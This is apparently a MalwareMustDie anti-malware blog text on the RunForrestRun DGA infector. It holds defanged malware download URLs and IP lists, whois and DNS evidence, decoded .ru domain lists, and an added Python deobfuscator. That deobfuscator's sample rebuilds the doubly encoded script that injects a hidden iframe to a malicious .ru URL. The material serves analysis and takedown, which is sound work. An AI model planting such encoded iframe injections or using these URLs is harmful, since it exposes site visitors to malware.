0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99

// grep userid*

0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141

---
#MalwareMustDie! $ date
Tue Jul 16 22:14:11 JST 2013
The domain list and the IPs that were up as of Fri Jul 19 20:01:00 JST 2013, during the shutdown process:
uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
cibowjuv.ru,, // down
pedtokid.ru,, // down
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
ankoweco.ru,, // down
uxmadjox.ru,, // down
hozfezbe.ru,178.210.222.205,

Again, we thank all friends, entities and supporters for your great cooperation and advice. Analysing and spotting a threat is one thing, but the hardest part is to make the threat go down, and better yet to make the individuals responsible for the crime pay what they deserve.

MalwareMustDie will continue every effort to dismantle malware from the internet and to provide every piece of crime evidence found to the related authorities. Your help and support on every investigation will be very much appreciated.

Public announcement by #MalwareMustDie, NPO., 2013. All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

Tuesday, 23 July 2013

I came across an infected site spotted in a Japanese network, as per the snapshot below:

It is a site that guides and introduces work for women workers, and that site is infected with the obfuscated code of RunForrestRun, a DGA .RU domain-based malware infection. We have had experience with this DGA from day one of MalwareMustDie, so if you search for the RunForrestRun keyword in our blog you'll see many results like this-->>[Google Search Result].

Having successfully shut down and stopped those infection cases in the past, using the knowledge we gathered, we released a public guideline for handling DGA cases, posted on our Google Code here-->>[GoogleCode]

For a while we did not see any activity from this infector, until yesterday, when we accidentally saw the same infector once more. We posted these findings and how to decode them in our Twitter announcement here:

The obfuscation code

There are some changes in the infector we spotted now: the randomization logic is slightly improved, and the double obfuscation uses a "Blackhole" style of JavaScript encoding. The obfuscation itself is encoded in two layers; we saw a similar encoding style in infected sites leading to the Blackhole or Cool Exploit Kit, suggesting a correlation between those cases (i.e. they purchased the encoding service). The decoding steps can be viewed in our pastebin here-->>[PASTEBIN]

If we look at the front (outer) encoding, the one we saw injected into the hacked site, it has the structure below:

Note the typical tag used for the encoded part (red colour), wrapped within the script tag (purple colour); JavaScript's String.fromCharCode method is used to decode the long obfuscated data between those tags.

Running the above code in any JS emulator gives us the real obfuscated code. The hex-encoded code is pasted in the pastebin link (mentioned above) too. Feeding the long obfuscated data into the logic below:

document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? 
..stores that data in the document object to be decoded by the generator below:

where the red colour shows the deobfuscation logic and the purple colour shows the "eval" method used to run the decoded value.
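The outer String.fromCharCode layer described above does not need a JS emulator: the argument list is plain decimal literals, so it can be unwrapped statically and the script is never executed. Below is an added example of that (my code, not the post's decoding steps or the MMD pastebin); the two-layer sample it works on is constructed here in the shape the post describes, wrapping an IFRAME to one of the .RU DGA domains from this post, and the helper and function names are mine.

```python
import re
from typing import List

# Matches one String.fromCharCode(...) call whose arguments are plain decimal
# literals, the form this post's outer layer uses.
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]+?)\s*\)")
URL = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"<>]*)?")


def decode_fromcharcode(js: str) -> str:
    """Replace each String.fromCharCode(n, n, ...) call with the string it builds.

    A replacement *function* is used so that backslashes or quotes in the decoded
    text are inserted verbatim rather than interpreted by re.sub.
    """
    def build(m) -> str:
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return "".join(chr(c) for c in codes)
    return FROMCHARCODE.sub(build, js)


def peel(js: str, max_layers: int = 5) -> List[str]:
    """Statically unwrap nested fromCharCode layers, at most max_layers decoding passes.

    Returns every stage, outermost first, so each layer can be inspected; the
    script itself is never evaluated.
    """
    layers = [js]
    while FROMCHARCODE.search(layers[-1]) and len(layers) <= max_layers:
        layers.append(decode_fromcharcode(layers[-1]))
    return layers


def extract_urls(js: str) -> List[str]:
    """Pull http(s) URLs out of decoded JavaScript, in order, without duplicates."""
    seen, out = set(), []
    for u in URL.findall(js):
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


def _charcode_call(s: str) -> str:
    """Encode a string the way the obfuscator does, for building the sample."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


# Constructed two-layer sample in the shape the post describes: the real payload
# (an IFRAME to a DGA .RU domain from this post) wrapped twice in eval(String.fromCharCode(...)).
INNER = ("document.write(\"<iframe src='http://bumggasfaoywfncc.ru/runforestrun?sid=botnet2'"
         " width=1 height=1></iframe>\")")
LAYER1 = "eval(" + _charcode_call(INNER) + ")"
SAMPLE = "<script>eval(" + _charcode_call(LAYER1) + ")</script>"


if __name__ == "__main__":
    stages = peel(SAMPLE)
    for i, stage in enumerate(stages):
        print(f"--- layer {i} ({len(stage)} bytes) ---")
        print(stage[:120] + ("..." if len(stage) > 120 else ""))
    print("IOCs:", extract_urls(stages[-1]))
```

This only handles the literal-argument form; the second stage on this page builds its data through the document object and a generator function, which is why the post falls back to an emulator for that layer. The static pass is still worth running first, because it yields the next layer and any hard-coded URLs without giving the sample a chance to run.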

Finally we arrive at the final deobfuscated result, which is the core of the "RunForrestRun" infector's domain randomization logic itself. In this version I separated the randomization code into three parts: the seeds, the calculation part and the formulation logic, as per the breakdown below:

And the result is written as an IFRAME pointing at a .RU URL of the form:

"h00p://" + domainName + ".RU/runforestrun?sid=botnet2"
as the code below states:

The infector domain and current status

Our friend, Mr. Darrel Rendell, helped to extract the .RU infector domains based on the time input to the randomization logic, as he tweeted below:

The result is nicely separated by the date function, within a one-year cycle, into 365 extracted domains, which can be viewed here-->>[PASTEBIN] < Thank you for the help on this.

I just checked whether the extracted domains are currently ALIVE, using our beloved tool which we share here-->>[GoogleCode], and found the domains below are currently UP & ALIVE:

bumggasfaoywfncc.ru,195.22.26.231,
vvteeuevhpbpepfi.ru,91.233.244.102,
ijxsncuprepwqzlt.ru,91.233.244.102,
knuidyekzkyuhtpi.ru,91.233.244.102,
You can see the check PoC that I performed in our paste here-->>[MMD Pastebin]
The other way to check whether these domains are alive is via the root DNS itself; I picked the first domain, traced its records in DNS just now and found it alive:
Tracing to bumggasfaoywfncc.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (193.232.128.6)
| |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) Got authoritative answer
| \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) Got authoritative answer
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
| \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
| \___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
| \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
\___ f.dns.ripn.net [ru] (193.232.156.17)
|\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
\___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
Below are the current URLQuery reports for the four alive .RU infector URLs/domains above, used to check the HTTP response; thanks to URLQuery for its "on-the-record" feature:
http://urlquery.net/report.php?id=3952242
http://urlquery.net/report.php?id=3952365
http://urlquery.net/report.php?id=3952414
http://urlquery.net/report.php?id=3952290
The three domains above that resolve to the IP 91.233.244.102 are currently active domains, as proven by the whois data below:
domain:        VVTEEUEVHPBPEPFI.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.04.15
paid-till: 2014.04.15
free-date: 2014.05.16
source: TCI
Last updated on 2013.07.24 01:36:36 MSK

domain: IJXSNCUPREPWQZLT.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.04.15
paid-till: 2014.04.15
free-date: 2014.05.16
source: TCI
Last updated on 2013.07.24 01:36:36 MSK

domain: KNUIDYEKZKYUHTPI.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2012.11.06
paid-till: 2013.11.06
free-date: 2013.12.07
source: TCI
Last updated on 2013.07.24 01:36:36 MSK
As seen in the above data, the REGGI.RU registrar was somehow tricked/abused into letting these domains onto the internet. Later on we learned that the one remaining domain was sinkholed at 195.22.26.231.
We also learned that abusive registrations at Russian registrars always show the status REGISTERED, DELEGATED, UNVERIFIED, just as stated for the active domains above. This information is very important for following up the shutdown process.
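Since the registration state is what the takedown follow-up hinges on, it helps to pull it out of the raw whois text automatically instead of reading each record by eye. The script below is an added example (not code from this post or from the MMD tools); it parses RIPN-style whois output into records, lists the domains whose state carries UNVERIFIED, groups them by registrar for abuse reporting, and computes how long each domain stays paid for. The sample input is the whois text quoted above for two of the domains; the field names (state, registrar, nserver, paid-till) are the ones that appear in that output.

```python
"""Parse RIPN-style whois records and flag UNVERIFIED registrations.

Added example for this post, not MalwareMustDie code. Assumes the
"key: value" layout shown in the whois output above, where a new record
starts at a "domain:" line and "nserver:" may repeat.
"""
from datetime import date

# Whois text as quoted in the post for two of the live infector domains.
SAMPLE_WHOIS = """
domain:        VVTEEUEVHPBPEPFI.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.04.15
paid-till: 2014.04.15
free-date: 2014.05.16
source: TCI
Last updated on 2013.07.24 01:36:36 MSK

domain: KNUIDYEKZKYUHTPI.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2012.11.06
paid-till: 2013.11.06
free-date: 2013.12.07
source: TCI
Last updated on 2013.07.24 01:36:36 MSK
"""


def parse_ripn_whois(text):
    """Split whois output into one dict per record; nserver values become a list."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith("last updated"):
            continue  # blank separators and the trailer carry no fields
        key, sep, value = line.partition(":")  # split on the first colon only
        if not sep:
            continue
        key, value = key.strip().lower(), value.strip()
        if key == "domain":
            current = {"domain": value.lower().rstrip("."), "nserver": []}
            records.append(current)
        elif current is None:
            continue  # field before any domain: line, ignore
        elif key == "nserver":
            current["nserver"].append(value.lower().rstrip("."))
        else:
            current[key] = value
    return records


def parse_ripn_date(text):
    """RIPN prints dates as YYYY.MM.DD."""
    year, month, day = (int(part) for part in text.split("."))
    return date(year, month, day)


def unverified_domains(records):
    """Domains whose state flags include UNVERIFIED (registrant identity not confirmed)."""
    result = []
    for rec in records:
        flags = {f.strip().upper() for f in rec.get("state", "").split(",")}
        if "UNVERIFIED" in flags:
            result.append(rec["domain"])
    return result


def group_by_registrar(records):
    """Map registrar id -> domains, so one abuse report covers all its domains."""
    groups = {}
    for rec in records:
        groups.setdefault(rec.get("registrar", "unknown"), []).append(rec["domain"])
    return groups


def days_until_expiry(record, today):
    """Days left on the paid period; negative means already past paid-till."""
    return (parse_ripn_date(record["paid-till"]) - today).days


if __name__ == "__main__":
    recs = parse_ripn_whois(SAMPLE_WHOIS)
    print("unverified:", unverified_domains(recs))
    print("by registrar:", group_by_registrar(recs))
    for rec in recs:
        print(rec["domain"], "paid for", days_until_expiry(rec, date(2013, 7, 24)), "more days")
```

The UNVERIFIED flag alone is not proof of abuse (legitimate registrants also skip verification), so treat it as a triage signal that goes alongside the liveness check and the sinkhole status when assembling the registrar report.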

The conclusion

This DGA is ALIVE and harmful. Please block these domains, for they are proven ALIVE.
The usage of this DGA will not be for anything good, so no further verdict is needed from our side.
Our friend Conrad Longmore, from the Dynamoo Blog, also suggests that all of us block the IP 91.233.244.102, as many malicious activities have been recorded at this IP, as per his tweet below:

For the convenience of the dismantling effort we also paste below the list of domains we decoded from this DGA; sorry for taking so much space in this report:
kxfcnwlyyohascji.ru
wjikjkybqouienfm.ru
jwkynwfxjqdqqmji.ru
vjnhblgryauqcpmr.ru
iwoughjskqxnoury.ru
tirdttcivfplnrds.ru
gwtrhozqbvudulyl.ru
siwafwlsbplqrxly.ru
fvxordgblagqooqx.ru
rhbyvkanoqokqyit.ru
evdmudjenjokhgmz.ru
phgunkwwcglepbdc.ru
cuijmuljysivscwe.ru
oglrzlxpvxfhgihb.ru
bumggasfaoywfncc.ru
ngpormkfmmcfgysb.ru
yrqwbnjqbnfhpbuu.ru
lguktmilemdssbyx.ru
xrvstpmjbtxnttxd.ru
kfzhvfgdfixkfdrr.ru
wqbrmmqhlkusiixa.ru
jfegifyhkbjxfflc.ru
uqfnewvxvyvsrxuk.ru
hejcagnpfrpnqefc.ru
tqkkpnnamkpqnyym.ru
genyzeyokjwxykzm.ru
spphczekzysdypqb.ru
fdsvrfljfaskbylv.ru
qptetotipsmswbqw.ru
ddxrlumbiwovldwg.ru
poyalyqorovwqves.ru
ntppvruxnkdjhvbh.ru
